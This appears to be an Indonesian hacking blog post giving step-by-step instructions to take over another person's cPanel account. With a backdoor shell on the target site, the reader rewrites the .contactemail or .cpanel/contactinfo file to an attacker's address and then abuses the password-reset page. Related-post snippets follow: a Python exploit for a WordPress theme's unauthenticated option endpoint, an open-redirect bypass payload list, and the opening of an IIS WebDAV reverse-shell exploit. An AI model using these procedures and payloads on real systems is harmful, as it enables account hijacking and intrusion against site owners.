Langsung ke konten utama

Cara Mudah Hack cPanel dengan Fitur Reset Password

Cara Mudah Hack cPanel dengan Fitur Reset Password. Oke kali ini saya cuma mau sharing sedikit tentang trik bagaimana men-takeover cpanel milik orang lain tanpa bruteforce. Jadi hanya memanfaatkan fitur reset password di cPanel.
Namun, sebelum memulai, harus ada beberapa syarat yang dipenuhi, yakni:
  • Memiliki akses shell di web target
  • Web target menggunakan cPanel yang mengaktifkan fitur reset password
Syarat pertama jelas kalian sudah tau. Ya karena gak mungkin dong pihak cPanel sebercanda itu bikin fitur yang bisa diakses semua orang. Itulah kenapa kita memerlukan akses shell/backdoor/file manager di web target. Untuk syarat kedua akan saya jelaskan nanti.

Cara Hack cPanel

Pertama, edit file contact di /home/[user cpanel]/.contactemail
Ubah email yang tertera disana dengan email milik kalian. Itulah kenapa kita butuh akses shell. Tanya aksesnya, kita tidak bisa memodifikasi file tersebut.
Selanjutnya kita reset password cPanel nya. Pergi ke alamat berikut webtarget.com:2083/resetpass . Jika memang fitur reset passwordnya aktif, maka tampilannya akan menjadi seperti ini:
Dan jika tampilannya menunjukkan pesan error “This feature is disabled.” berarti reset password tidak bisa dilakukan.
Oke lanjut, setelah muncul halaman reset password, masukkan username cpanel nya. Untuk username cpanel, tentunya kalian sudah tau. Biasanya diperlihatkan di shell (system info), atau bisa juga kalian cek usernya lewat direktori home. Lalu klik Reset Password.
Lalu masukkan email kalian (yang sudah kalian masukkan ke file .contactemail).
Lalu klik Send Security Code. Jika sudah, cek email kalian.
Lalu input-kan code tadi di web cPanel.
Jika kode nya benar, maka kalian akan dibawa ke halaman reset password cPanel.
Selanjutnya tinggal login ke cPanel menggunakan password baru.
Cara Kedua
Nah di beberapa kasus, meski telah mengubah file .contactemail tapi email reset password tidak berubah. Sekarang kita coba edit file /home/[user]/.cpanel/contactinfo
Setelah diedit, tinggal ulangi step reset password diatas.
Mudah bukan? Sekian tutorial singkat kali ini, jika ada yang ingin ditanyakan tinggalkan komentar.

Komentar

Postingan populer dari blog ini

Wordpress Premium Themes Shopsum Unauthenticated Configuration

# Exploit  Title : Wordpress Premium Themes Shopsum Unauthenticated Configuration Access Vulnerability # Author  : Mr.Buckethead # Date  : November 13th, 2014 # Category  : Web Applications # Vulnerability  : Unauthenticated Configuration Access # Tested  On : Windows 7 32-bit, Backbox # Dork  : inurl:/wp-content/themes/shopsum/hades_framework/ or use ur imagination #Exploit : http://localhost/path/wp-content/themes/shopsum/hades_framework/option_panel/ajax.php # POC  : Save File As Python (.py) = import httplib, urllib # target  site site = "victim" #<--- no http:// or https:// # path  to ajax.php url = "t/wp-content/themes/shopsum/hades_framework/option_panel/ajax.php" def ChangeOption(site, url, option_name, option_value): params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value}) headers = {"Content-type": "application/x-www-form-urlencoded", "Accept...

Open Redirect Bypass Cheat Sheet

Open Redirect Bypass Cheat Sheet   Yoo Cherry     August 3, 2019     Cheat Sheet ,  Web Hacking     No Comments Open Redirect Bypass Cheat Sheet.  Open redirect  adalah celah yang memungkinkan attacker untuk mengarahkan pengunjung dari situs terpercaya ke situs malware atau phising tanpa autentifikasi dari admin situs. Bergantung pada arsitektur situs web yang rentan, pengalihan bisa terjadi setelah tindakan tertentu, seperti login, dan terkadang hal itu bisa terjadi seketika saat memuat sebuah halaman. Open Redirect Bypass Cheat Sheet http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] http://XY>.7d8T\205pZM@[::ffff:216.58.214.206] http://0xd8.072.54990 http://www.whitelisteddomain.tld@0xd8.072.54990 http://3H6k7lIAiqjfNeN@0xd8.072.54990 http://XY>.7d8T\205pZM@0xd8.072.54990 http://0xd8.3856078 http://www.whitelisteddomain.tld@0xd8.3856078 http://3H6k7lIAiqjfNeN@0xd8.3856078 http://XY>.7d8T\205pZM@0xd8.3856078 ...

Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow

/*******************************************************************/ /* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */ /* --------------------------------------------------------------- */ /* this is the exploit for ntdll.dll through WebDAV. */ /* run a netcat ex: nc -L -vv -p 666 */ /* wb server.com your_ip 666 0 */ /* the shellcode is a reverse remote shell */ /* you need to pad a bit.. the best way I think is launching */ /* the exploit with pad = 0 and after that, the server will be */ /* down for a couple of seconds, now retry with pad at 1 */ /* and so on..pad 2.. pad 3.. if you haven't the shell after */ /* something like pad at 10 I think you better to restart from */ /* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */ /* on all the others servers it was at 2,3,4, etc..sometimes */ /* you can have the force with you, and get the shell in 1 try */ /* sometimes you need to pad more than 10 times ;) */ /* the shellcode was coded by m...